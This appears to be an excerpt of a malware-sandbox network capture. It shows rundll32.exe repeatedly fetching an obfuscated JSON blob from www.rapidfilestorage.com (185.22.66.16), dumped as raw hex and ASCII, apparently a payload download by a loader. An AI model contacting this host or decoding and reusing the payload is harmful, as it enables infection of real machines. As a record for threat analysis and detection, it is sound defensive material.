Aug 31, 2024 22:05:14.716875076 CEST	1236	IN	Data Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30 Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:14.716881990 CEST	448	IN	Data Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32 Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:14.716887951 CEST	1236	IN	Data Raw: 53 33 51 72 53 35 56 72 53 33 4f 72 53 30 5d 72 53 36 5c 72 53 30 57 72 53 33 5b 72 53 33 42 72 53 37 4f 72 53 37 57 72 53 35 55 72 53 36 53 72 53 31 5c 72 53 36 5d 72 53 30 58 72 53 38 53 72 53 38 59 72 53 34 5a 72 53 31 51 72 53 32 53 72 53 36 Data Ascii: S3QrS5VrS3OrS0]rS6\rS0WrS3[rS3BrS7OrS7WrS5UrS6SrS1\rS6]rS0XrS8SrS8YrS4ZrS1QrS2SrS6BrS9[rS0\rS6TrS0VsS2dsS8XsS5VsS1QrS6^rS0UrS8SrS1SrS3BrS3QrS2PrS0^rS5YrS0UrS2ZrS0SrS3PrS2UrS5QrS6SrS4]rS1TrS4ZrS5\rS9[rS9VrS1OrS2YrS8XrS7OrS4]rS1PrS7[rS4\rS5PrS1V
Aug 31, 2024 22:05:14.716892958 CEST	1236	IN	Data Raw: 53 38 51 72 53 37 56 72 53 38 58 72 53 37 56 73 53 32 64 73 53 31 58 73 53 38 56 73 53 30 50 72 53 38 5a 72 53 36 50 72 53 35 5e 72 53 33 56 72 53 32 4f 72 53 31 53 72 53 33 50 72 53 30 58 72 53 37 50 72 53 35 5e 72 53 30 59 72 53 33 42 72 53 37 Data Ascii: S8QrS7VrS8XrS7VsS2dsS1XsS8VsS0PrS8ZrS6PrS5^rS3VrS2OrS1SrS3PrS0XrS7PrS5^rS0YrS3BrS7UrS1SrS7PrS5UrS2OrS0^rS0]rS8OrS9\rS8\rS6VrS0VrS0\rS2[rS4BrS5\rS9ZrS7XrS6]rS4VsS5dsS1XsS5VsS4PrS5ZrS1]rS4]rS1[rS1]rS9YrS6YrS2\rS1YrS6SrS8[rS6TrS0WrS4XrS5OrS6QrS2B
Aug 31, 2024 22:05:14.716900110 CEST	448	IN	Data Raw: 53 31 5c 72 53 34 50 72 53 32 5d 72 53 30 59 72 53 34 5e 72 53 31 4f 72 53 38 5c 72 53 33 51 72 53 30 5b 72 53 38 58 72 53 33 54 72 53 35 53 72 53 39 5c 72 53 34 5d 72 53 36 5e 72 53 32 5a 72 53 32 5a 72 53 30 50 72 53 35 56 73 53 30 64 73 53 37 Data Ascii: S1\rS4PrS2]rS0YrS4^rS1OrS8\rS3QrS0[rS8XrS3TrS5SrS9\rS4]rS6^rS2ZrS2ZrS0PrS5VsS0dsS7XsS4VsS0OrS9PrS4ZrS1\rS0UrS1YrS3PrS7OrS2PrS2SrS1OrS4YrS8YrS0OrS1QrS3YrS5ZrS7WrS8UrS4TrS6YrS2UrS5UrS6TrS5YrS4UrS1UrS1^rS3VrS9\rS2YrS9^rS3VsS2dsS7XsS1VsS2OrS2UrS0Q
Aug 31, 2024 22:05:14.716943979 CEST	1236	IN	Data Raw: 53 31 5e 72 53 30 5b 72 53 33 51 72 53 35 42 72 53 36 57 72 53 33 56 72 53 34 5d 72 53 30 4f 72 53 34 53 72 53 34 58 72 53 35 5b 72 53 35 5c 72 53 38 5d 72 53 38 5a 72 53 33 56 73 53 31 64 73 53 36 58 73 53 32 56 73 53 37 4f 72 53 34 5a 72 53 36 Data Ascii: S1^rS0[rS3QrS5BrS6WrS3VrS4]rS0OrS4SrS4XrS5[rS5\rS8]rS8ZrS3VsS1dsS6XsS2VsS7OrS4ZrS6QrS7OrS3QrS2OrS0OrS4SrS3TrS8YrS5]rS3^rS4ZrS5TrS6BrS3OrS6PrS9TrS6\rS3]rS7YrS7YrS3QrS7WrS5ZrS9UrS6QrS4SrS8OrS0SrS1[rS8\rS7VsS3dsS7XsS0VsS5OrS6ZrS3PrS3OrS7QrS6WrS6O
Aug 31, 2024 22:05:14.716949940 CEST	224	IN	Data Raw: 53 31 55 72 53 39 53 72 53 34 5a 72 53 32 5d 72 53 33 58 72 53 30 56 72 53 38 54 72 53 33 56 72 53 33 5d 72 53 34 5c 72 53 32 55 72 53 38 59 72 53 30 5e 72 53 35 58 72 53 39 55 72 53 34 59 72 53 30 50 72 53 30 58 72 53 34 5c 72 53 31 55 72 53 35 Data Ascii: S1UrS9SrS4ZrS2]rS3XrS0VrS8TrS3VrS3]rS4\rS2UrS8YrS0^rS5XrS9UrS4YrS0PrS0XrS4\rS1UrS5]rS7TrS7VrS3WrS6[rS6XrS0VrS7ZrS9^rS8VsS8dsS8XsS8VsS2OrS8[rS3ZrS1UrS1OrS2\rS9SrS4BrS8ZrS6PrS2BrS6BrS6XrS2BrS6QrS5[rS0WrS6UrS4YrS2^rS9QrS6YrS8Or
Aug 31, 2024 22:05:14.717020988 CEST	1236	IN	Data Raw: 53 32 5a 72 53 38 5a 72 53 33 53 72 53 37 53 72 53 36 53 72 53 34 4f 72 53 33 5d 72 53 35 58 72 53 35 50 72 53 38 56 73 53 36 64 73 53 33 58 73 53 33 56 73 53 38 4f 72 53 39 42 72 53 34 50 72 53 32 53 72 53 33 5a 72 53 35 42 72 53 35 51 72 53 38 Data Ascii: S2ZrS8ZrS3SrS7SrS6SrS4OrS3]rS5XrS5PrS8VsS6dsS3XsS3VsS8OrS9BrS4PrS2SrS3ZrS5BrS5QrS8^rS2TrS7TrS3SrS3]rS6SrS1[rS5OrS6]rS2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5X
Aug 31, 2024 22:05:14.717060089 CEST	1236	IN	Data Raw: 53 33 51 72 53 35 5d 72 53 31 42 72 53 37 57 72 53 30 5b 72 53 31 53 72 53 38 5d 72 53 33 57 72 53 38 5d 72 53 35 5c 72 53 31 5d 72 53 33 42 72 53 34 54 72 53 35 5a 72 53 36 54 72 53 35 42 72 53 31 50 72 53 36 53 72 53 34 55 72 53 36 56 72 53 31 Data Ascii: S3QrS5]rS1BrS7WrS0[rS1SrS8]rS3WrS8]rS5\rS1]rS3BrS4TrS5ZrS6TrS5BrS1PrS6SrS4UrS6VrS1BrS6]rS4TrS9]rS6VsS8dsS4XsS5VsS5VrS0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0V
Aug 31, 2024 22:05:14.721767902 CEST	1236	IN	Data Raw: 53 34 55 72 53 35 5b 72 53 32 5d 72 53 39 56 73 53 31 64 73 53 32 58 73 53 35 56 73 53 32 56 72 53 36 42 72 53 38 56 72 53 30 5d 72 53 33 5a 72 53 36 54 72 53 31 5b 72 53 30 4f 72 53 37 59 72 53 31 5e 72 53 31 5c 72 53 30 55 72 53 32 57 72 53 34 Data Ascii: S4UrS5[rS2]rS9VsS1dsS2XsS5VsS2VrS6BrS8VrS0]rS3ZrS6TrS1[rS0OrS7YrS1^rS1\rS0UrS2WrS4UrS6OrS6TrS6XrS7SrS7YrS4]rS1XrS9VrS7UrS4OrS7WrS1QrS7OrS5ZrS8TrS2PrS8UrS9OrS9VsS6dsS5XsS1VsS1UrS4QrS6ZrS5UrS9PrS0QrS8]rS3YrS2[rS9BrS4VrS7ZrS1UrS2TrS9\rS9VrS4\rS2]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49710	185.22.66.16	80	7816	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:05:13.934108019 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 22:05:14.733997107 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 31 Aug 2024 20:05:14 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=44fec3a2d4e8f0a420dbe578a10a780f; Path=/; Secure; HttpOnly Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT ETag: "66bb4169-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED] Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
Aug 31, 2024 22:05:14.734071970 CEST	1236	IN	Data Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30 Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:14.734078884 CEST	1236	IN	Data Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32 Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:14.734086037 CEST	1236	IN	Data Raw: 53 30 42 72 53 36 54 72 53 33 5c 72 53 32 5a 72 53 31 55 72 53 30 5b 72 53 36 59 72 53 32 56 73 53 35 64 73 53 35 58 73 53 37 56 73 53 37 50 72 53 37 51 72 53 37 42 72 53 37 55 72 53 32 50 72 53 30 55 72 53 38 57 72 53 38 4f 72 53 32 51 72 53 39 Data Ascii: S0BrS6TrS3\rS2ZrS1UrS0[rS6YrS2VsS5dsS5XsS7VsS7PrS7QrS7BrS7UrS2PrS0UrS8WrS8OrS2QrS9BrS7UrS0ZrS7TrS0QrS0BrS9OrS6YrS6^rS2[rS4]rS8PrS4PrS0SrS5UrS2BrS4SrS6UrS4VrS0]rS6\rS0]rS9\rS5VsS6dsS7XsS2VsS7PrS2VrS0TrS6XrS0OrS5BrS0VrS3YrS8\rS6[rS3]rS4]rS9QrS4B
Aug 31, 2024 22:05:14.734142065 CEST	1236	IN	Data Raw: 53 36 51 72 53 31 5a 72 53 34 5b 72 53 34 57 72 53 32 51 72 53 37 55 72 53 34 5e 72 53 35 5c 72 53 30 5b 72 53 38 5d 72 53 35 53 72 53 33 53 72 53 39 50 72 53 38 5b 72 53 38 5a 72 53 35 54 72 53 39 50 72 53 31 59 72 53 34 5d 72 53 36 4f 72 53 32 Data Ascii: S6QrS1ZrS4[rS4WrS2QrS7UrS4^rS5\rS0[rS8]rS5SrS3SrS9PrS8[rS8ZrS5TrS9PrS1YrS4]rS6OrS2YrS4QrS2VsS9dsS5XsS9VsS0PrS9BrS0YrS5[rS8BrS1]rS1\rS5UrS7UrS4QrS8VrS3TrS5QrS0BrS2YrS0TrS2UrS2XrS2WrS9TrS0BrS3QrS8ZrS5BrS3^rS3XrS8WrS6YrS3OrS7BrS1YrS6WrS4VsS9dsS8X
Aug 31, 2024 22:05:14.734148979 CEST	1236	IN	Data Raw: 53 30 53 72 53 32 56 73 53 36 64 73 53 38 58 73 53 32 56 73 53 39 4f 72 53 38 5a 72 53 30 57 72 53 36 5e 72 53 39 51 72 53 37 51 72 53 36 5c 72 53 39 5a 72 53 32 54 72 53 36 55 72 53 35 54 72 53 35 50 72 53 36 5c 72 53 35 42 72 53 39 5b 72 53 30 Data Ascii: S0SrS2VsS6dsS8XsS2VsS9OrS8ZrS0WrS6^rS9QrS7QrS6\rS9ZrS2TrS6UrS5TrS5PrS6\rS5BrS9[rS0YrS9ZrS5OrS1WrS0PrS5\rS2UrS9TrS5ZrS7QrS9WrS3SrS8[rS0^rS1\rS6]rS4OrS8VsS0dsS6XsS2VsS0OrS3XrS2QrS9PrS6]rS1VrS5XrS3OrS6TrS9OrS0TrS2VrS4]rS3TrS3TrS5YrS0]rS5\rS3VrS6Z
Aug 31, 2024 22:05:14.734173059 CEST	1236	IN	Data Raw: 53 32 5c 72 53 34 59 72 53 34 53 72 53 36 54 72 53 35 5a 72 53 35 51 72 53 36 5e 72 53 38 53 72 53 37 5a 72 53 37 5d 72 53 36 51 72 53 31 55 72 53 34 5d 72 53 36 54 72 53 37 54 72 53 32 5b 72 53 39 56 73 53 36 64 73 53 35 58 73 53 34 56 73 53 39 Data Ascii: S2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5XrS2^rS2WrS6ZrS4OrS2PrS5^rS6QrS0VrS2BrS6BrS0XrS2BrS7ZrS1SrS6^rS6PrS4YrS6SrS4QrS0]rS3VsS3dsS9XsS8VsS2VrS1PrS5QrS8[rS2\
Aug 31, 2024 22:05:14.734179020 CEST	1236	IN	Data Raw: 53 30 58 72 53 34 5a 72 53 39 53 72 53 33 59 72 53 38 51 72 53 37 5a 72 53 31 5b 72 53 30 5d 72 53 38 58 72 53 37 57 72 53 36 51 72 53 35 50 72 53 31 58 72 53 32 56 72 53 39 5b 72 53 33 56 72 53 38 5e 72 53 37 55 72 53 35 5d 72 53 30 5a 72 53 36 Data Ascii: S0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0VsS8dsS1XsS2VsS9VrS4XrS7\rS8BrS8SrS0VrS1TrS7ZrS1BrS9UrS2WrS4WrS4TrS7\rS4VrS5[rS1BrS5OrS3OrS9ZrS7VrS2BrS5BrS8UrS1ZrS8X
Aug 31, 2024 22:05:14.734184980 CEST	1236	IN	Data Raw: 53 37 55 72 53 34 4f 72 53 37 57 72 53 31 51 72 53 37 4f 72 53 35 5a 72 53 38 54 72 53 32 50 72 53 38 55 72 53 39 4f 72 53 39 56 73 53 36 64 73 53 35 58 73 53 31 56 73 53 31 55 72 53 34 51 72 53 36 5a 72 53 35 55 72 53 39 50 72 53 30 51 72 53 38 Data Ascii: S7UrS4OrS7WrS1QrS7OrS5ZrS8TrS2PrS8UrS9OrS9VsS6dsS5XsS1VsS1UrS4QrS6ZrS5UrS9PrS0QrS8]rS3YrS2[rS9BrS4VrS7ZrS1UrS2TrS9\rS9VrS4\rS2]rS6QrS9BrS3BrS3OrS7YrS5ZrS0TrS8QrS7XrS6YrS1SrS5WrS0WrS7QrS7VsS8dsS4XsS0VsS7UrS1PrS0BrS7YrS0UrS0^rS7ZrS6^rS2\rS3\rS7B
Aug 31, 2024 22:05:14.734191895 CEST	1236	IN	Data Raw: 53 38 5b 72 53 39 5c 72 53 36 5a 72 53 30 55 72 53 32 59 72 53 35 5e 72 53 31 59 72 53 31 51 72 53 33 59 72 53 34 56 72 53 37 5b 72 53 37 5d 72 53 34 54 72 53 36 54 72 53 39 42 72 53 32 42 72 53 35 5e 72 53 35 54 72 53 30 5a 72 53 39 55 72 53 32 Data Ascii: S8[rS9\rS6ZrS0UrS2YrS5^rS1YrS1QrS3YrS4VrS7[rS7]rS4TrS6TrS9BrS2BrS5^rS5TrS0ZrS9UrS2OrS6]rS2WrS3QrS1SrS1VsS8dsS4XsS5VsS2UrS1YrS0YrS3]rS1\rS1]rS9YrS9[rS5YrS4BrS8QrS8TrS6OrS0[rS6WrS8PrS6TrS5YrS3WrS8PrS1^rS2XrS5TrS3VrS8UrS8[rS5XrS3BrS3OrS9SrS8PrS0Z
Aug 31, 2024 22:05:14.738936901 CEST	1236	IN	Data Raw: 53 36 5a 72 53 33 57 72 53 31 59 72 53 38 42 72 53 38 56 73 53 39 64 73 53 36 58 73 53 32 56 73 53 37 54 72 53 35 4f 72 53 33 5c 72 53 30 5b 72 53 30 56 72 53 34 4f 72 53 31 5a 72 53 36 59 72 53 35 5a 72 53 36 42 72 53 34 50 72 53 36 4f 72 53 31 Data Ascii: S6ZrS3WrS1YrS8BrS8VsS9dsS6XsS2VsS7TrS5OrS3\rS0[rS0VrS4OrS1ZrS6YrS5ZrS6BrS4PrS6OrS1XrS0YrS8[rS1TrS7YrS4VrS9WrS0WrS0UrS2QrS8YrS0[rS9UrS8XrS6SrS2BrS6YrS7XrS3WrS1^rS0VsS4dsS3XsS1VsS1TrS4VrS6OrS0WrS1[rS6OrS9\rS2TrS6ZrS9YrS2PrS0OrS4^rS5\rS5\rS4WrS8Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	185.22.66.16	80	8024	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:05:16.210118055 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 22:05:17.003241062 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 31 Aug 2024 20:05:16 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=13db8a2aaddbafa89a4e74ec4a29bdac; Path=/; Secure; HttpOnly Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT ETag: "66bb4169-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED] Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
Aug 31, 2024 22:05:17.003253937 CEST	1236	IN	Data Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30 Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:17.003264904 CEST	448	IN	Data Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32 Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:17.003782034 CEST	1236	IN	Data Raw: 53 33 51 72 53 35 56 72 53 33 4f 72 53 30 5d 72 53 36 5c 72 53 30 57 72 53 33 5b 72 53 33 42 72 53 37 4f 72 53 37 57 72 53 35 55 72 53 36 53 72 53 31 5c 72 53 36 5d 72 53 30 58 72 53 38 53 72 53 38 59 72 53 34 5a 72 53 31 51 72 53 32 53 72 53 36 Data Ascii: S3QrS5VrS3OrS0]rS6\rS0WrS3[rS3BrS7OrS7WrS5UrS6SrS1\rS6]rS0XrS8SrS8YrS4ZrS1QrS2SrS6BrS9[rS0\rS6TrS0VsS2dsS8XsS5VsS1QrS6^rS0UrS8SrS1SrS3BrS3QrS2PrS0^rS5YrS0UrS2ZrS0SrS3PrS2UrS5QrS6SrS4]rS1TrS4ZrS5\rS9[rS9VrS1OrS2YrS8XrS7OrS4]rS1PrS7[rS4\rS5PrS1V
